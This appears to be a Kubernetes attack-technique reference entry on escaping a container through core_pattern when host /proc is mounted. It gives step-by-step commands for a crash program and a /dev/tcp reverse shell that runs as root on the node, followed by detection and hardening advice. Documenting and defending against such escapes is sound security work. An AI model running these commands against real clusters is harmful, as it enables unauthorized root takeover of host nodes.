Container escape via the core_pattern
usermode_helper
in the case of an exposed /proc
mount.
Source | Destination | MITRE ATT&CK |
---|---|---|
Container | Node | Escape to Host, T1611 |
/proc/sys/kernel/core_pattern defines a program which is executed on core-file generation (typically a program crash) and is passed the core file as standard input if the first character of this file is a pipe symbol |
. This program is run by the root user and will allow up to 128 bytes of command line arguments. Attacker control of this progam would allow trivial code execution within the container host given any crash and core file generation (which can be simply discarded during a myriad of malicious actions). With write access to the host /proc
directory and no additional privileges, an attacker can abuse this to escape a container and gain root on the containing K8s node.
Execution within a container process with the host /proc/sys/kernel
(or any parent directory) mounted inside the container.
See the example pod spec.
Determine mounted volumes within the container as per VOLUME_DISCOVER. If the host /proc/sys/kernel
(or any parent directory) is mounted, this attack will be possible. Example below.
$ cat /proc/self/mounts
...
proc /hostproc proc rw,nosuid,nodev,noexec,relatime 0 0
...
First find the path of the container's filesystem on the host. This can be done by retrieving the current mounts (see VOLUME_DISCOVER). Looks for the upperdir
value of the overlayfs entry associated with containerd:
$ cat /etc/mtab # or `cat /proc/mounts` depending on the system
...
overlay / overlay rw,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/27/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/71/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/71/work 0 0
...
# Store path in a variable for future use
$ OVERLAY_PATH=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/71/fs
Oneliner alternative:
export OVERLAY_PATH=$(cat /proc/mounts | grep -oe upperdir="[^,]*," | cut -d = -f 2 | tr -d , | head -n 1)
Next create a mini program that will crash immediately and generate a kernel coredump. For example:
echo 'int main(void) {
char buf[1];
for (int i = 0; i < 100; i++) {
buf[i] = 1;
}
return 0;
}' > /tmp/crash.c
Compile the program and copy the binary into the container as crash:
apt update && apt install gcc
gcc -o crash /tmp/crash.c
Next write a shell script to be triggered inside the container's file system as shell.sh
:
# Reverse shell
REVERSE_IP=$(hostname -I | tr -d " ") && \
echo '#!/bin/sh' > /tmp/shell.sh
echo "sh -i >& /dev/tcp/${REVERSE_IP}/9000 0>&1" >> /tmp/shell.sh && \
chmod a+x /tmp/shell.sh
Finally write the usermode_helper
script path to the core_pattern
helper path and trigger the container escape:
# move to mounted folder with /proc
cd /sysproc
echo "|$OVERLAY_PATH/tmp/shell.sh" > core_pattern
cd
apt install netcat-traditional
sleep 5 && ./crash & nc -l -vv -p 9000
- Use the Datadog agent to monitor for creation of new
usermode_helper
programs via writes to known locations, in this case/proc/sys/kernel/core_pattern
.
Use a pod security policy or admission controller to prevent or limit the creation of pods with a hostPath
mount of /proc
or other sensitive locations.
Avoid running containers as the root
user. Enforce running as an unprivileged user account using the runAsNonRoot
setting inside securityContext
(or explicitly setting runAsUser
to an unprivileged user). Additionally, ensure that allowPrivilegeEscalation: false
is set in securityContext
to prevent a container running as an unprivileged user from being able to escalate to running as the root
user.